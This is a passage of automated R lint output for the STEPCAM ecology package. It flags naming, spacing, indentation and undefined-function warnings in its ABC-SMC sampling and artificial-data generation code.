^~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:12:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:154:29:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L154) *style:* **Variable and function names should be all lowercase.**\n```r\n​    while (numberAccepted < numParticles) {\n                            ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L158) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:158:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L158) *warning:* **no visible global function definition for ‘getRandomVals’**\n```r\n​        params <- getRandomVals(species_fallout)\n                  ^~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:160:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L160) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights,\n                  ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:162:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L162) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma)\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:191:20:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L191) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:191:20:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L191) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[, present_species])\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L192) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:194:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L194) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L200) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                          collapse = NULL), header = F)\n^\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L206) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:208:14:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:9:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:27:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:218:14:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L218) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:18:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:17:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:17:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:17:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum;\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:24:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] = 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:40:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L225) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] = 1\n                                       ^\n```\n[R/ABC_SMC.R:227:24:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] =\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:40:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L227) *style:* **Use <-, not =, for assignment.**\n```r\n​          next_weights[numberAccepted] =\n                                       ^\n```\n[R/ABC_SMC.R:228:13:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:13:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L232) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:232:14:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:232:34:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L232) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:238:21:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L238) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:238:22:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L238) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:240:13:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L240) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:240:38:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L240) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:258:54:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L258) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:261:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L261) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:9:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:262:32:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L262) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:265:27:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L265) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:265:27:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:20:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L266) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:267:20:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L267) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:268:20:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:278:61:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L278) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:281:59:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L281) *style:* **Put spaces around all infix operators.**\n```r\n​      d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n                                                         ~^~\n```\n[R/ABC_SMC.R:282:44:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/ABC_SMC.R#L282) *style:* **Put spaces around all infix operators.**\n```r\n​\t                          collapse = NULL), header = F)\n                                          ~^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:9:23:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:11:21:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:11:47:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:11:49:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L11) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:11:64:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:12:50:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:12:58:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:37:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:13:54:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/52c66053b34be6c530046e499be5bff5219ffec7/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 